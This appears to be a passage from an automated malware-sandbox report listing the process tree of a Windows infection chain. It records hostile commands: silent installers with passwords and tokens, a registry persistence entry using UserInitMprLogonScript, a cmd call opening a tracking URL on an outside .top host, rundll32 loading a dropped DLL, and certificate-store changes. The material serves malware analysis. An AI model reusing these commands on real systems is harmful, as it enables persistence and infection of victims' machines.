                                                                                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                PID:392
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                  29⤵
                                                                                                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                  PID:1836
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                    30⤵
                                                                                                                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                    PID:8076
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                      31⤵
                                                                                                                                                                                                                                                                                                                        PID:5352
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                          32⤵
                                                                                                                                                                                                                                                                                                                            PID:6432
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                              33⤵
                                                                                                                                                                                                                                                                                                                                PID:8136
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                  34⤵
                                                                                                                                                                                                                                                                                                                                    PID:2304
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                      35⤵
                                                                                                                                                                                                                                                                                                                                        PID:64
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                          36⤵
                                                                                                                                                                                                                                                                                                                                            PID:5880
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                              37⤵
                                                                                                                                                                                                                                                                                                                                                PID:2300
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                  38⤵
                                                                                                                                                                                                                                                                                                                                                    PID:4064
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                      39⤵
                                                                                                                                                                                                                                                                                                                                                        PID:4028
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                          40⤵
                                                                                                                                                                                                                                                                                                                                                            PID:8912
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                              41⤵
                                                                                                                                                                                                                                                                                                                                                                PID:1360
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                  42⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:1372
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                      43⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:7060
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                          44⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:7588
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                              45⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:8664
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                  46⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Drops startup file
                                                                                                                                                                                                                                                                                                                                                                                  PID:3988
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                        ping RJMQBVDN -n 30
                                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                                                                        PID:4708
                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                PID:2100
                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                  PID:5720
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-O39PI.tmp\Inlog.tmp
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-O39PI.tmp\Inlog.tmp" /SL5="$102C0,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                        PID:4264
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-1VGKM.tmp\Setup.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-1VGKM.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:6212
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-0AUQ5.tmp\Setup.tmp
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-0AUQ5.tmp\Setup.tmp" /SL5="$104E4,17369807,721408,C:\Users\Admin\AppData\Local\Temp\is-1VGKM.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                              PID:6172
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-RCHGR.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                PID:6156
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                                                                                                                                  expand C:\Users\Admin\AppData\Local\Temp\is-RCHGR.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                  PID:7280
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                  PID:1464
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                    reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                      PID:8232
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                                                                                    PID:2656
                                                                                                                                                                                                                                                                                                  • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                                                                                                                                                                                                                    "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                    PID:7164
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-RCHGR.tmp\{app}\vdi_compiler.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-RCHGR.tmp\{app}\vdi_compiler"
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                      PID:8548
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-RCHGR.tmp\{app}\vdi_compiler.exe"
                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                          PID:9592
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                            ping localhost -n 4
                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                                                                                                                            PID:9796
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                  PID:5432
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                  PID:4064
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                  PID:6248
                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 8922CF4D8C3D8FE91310C88C180BF6E4 C
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                    PID:7604
                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding BEEA691B3F1012E5C89FEFB698B783A6
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                    PID:4436
                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 2F8E80BE1397E3EE6099CFFC073C73EA C
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                    PID:5376
                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 4B287C7FDF95697D2FD9F6CC4B7C7024 C
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                    PID:6164
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                                                                    PID:9532
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                                                                                                      PID:9668
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                                                                                                                        PID:10068
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0xbc,0x1e8,0x7ff83db0dec0,0x7ff83db0ded0,0x7ff83db0dee0
                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                          PID:8716
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff62b5b9e70,0x7ff62b5b9e80,0x7ff62b5b9e90
                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                              PID:10120
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1664,9735162248478009427,15654752416886128439,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10068_49613715" --mojo-platform-channel-handle=1724 /prefetch:8
                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                            • Modifies system certificate store
                                                                                                                                                                                                                                                                                                            PID:9308
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1664,9735162248478009427,15654752416886128439,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10068_49613715" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1676 /prefetch:2
                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                              PID:10104
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1664,9735162248478009427,15654752416886128439,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10068_49613715" --mojo-platform-channel-handle=2196 /prefetch:8
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:10220
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1664,9735162248478009427,15654752416886128439,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10068_49613715" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=1960 /prefetch:1
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                                                                                                PID:6808
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1664,9735162248478009427,15654752416886128439,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10068_49613715" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2592 /prefetch:1
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                                                                                                PID:9288
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,9735162248478009427,15654752416886128439,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10068_49613715" --mojo-platform-channel-handle=3108 /prefetch:8
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                  PID:9428
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1664,9735162248478009427,15654752416886128439,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10068_49613715" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3148 /prefetch:2
                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                    PID:1936
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,9735162248478009427,15654752416886128439,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10068_49613715" --mojo-platform-channel-handle=1844 /prefetch:8
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                      PID:7376
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,9735162248478009427,15654752416886128439,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10068_49613715" --mojo-platform-channel-handle=3364 /prefetch:8
                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                        PID:9328
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,9735162248478009427,15654752416886128439,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10068_49613715" --mojo-platform-channel-handle=988 /prefetch:8
                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                          PID:9400
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,9735162248478009427,15654752416886128439,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10068_49613715" --mojo-platform-channel-handle=1840 /prefetch:8
                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                            PID:10028
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_B80E.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                        PID:9376
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                    PID:5036
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:3204
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
